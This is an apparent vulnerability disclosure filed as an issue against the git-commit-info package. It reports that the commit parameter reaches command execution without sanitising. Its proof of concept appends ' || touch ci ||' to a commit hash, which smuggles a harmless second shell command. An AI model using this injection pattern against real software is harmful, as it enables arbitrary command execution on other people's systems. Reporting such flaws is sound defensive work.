Closed
Description
Hi,
We would like to report a potential security vulnerability.
The bug is introduced because the package-exported method gitCommitInfo() fails to sanitize its parameter commit, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once they control the hash content.
Here is the proof of concept.
const gitCommitInfo = require('git-commit-info')
// information of the latest commit in ./my_repo
gitCommitInfo({
cwd: './my_repo',
commit: '82442c2405804d7aa44e7bedbc0b93bb17707626' + " || touch ci ||", // a malicious file named ci will be created
});
Please consider fixing it. Thanks!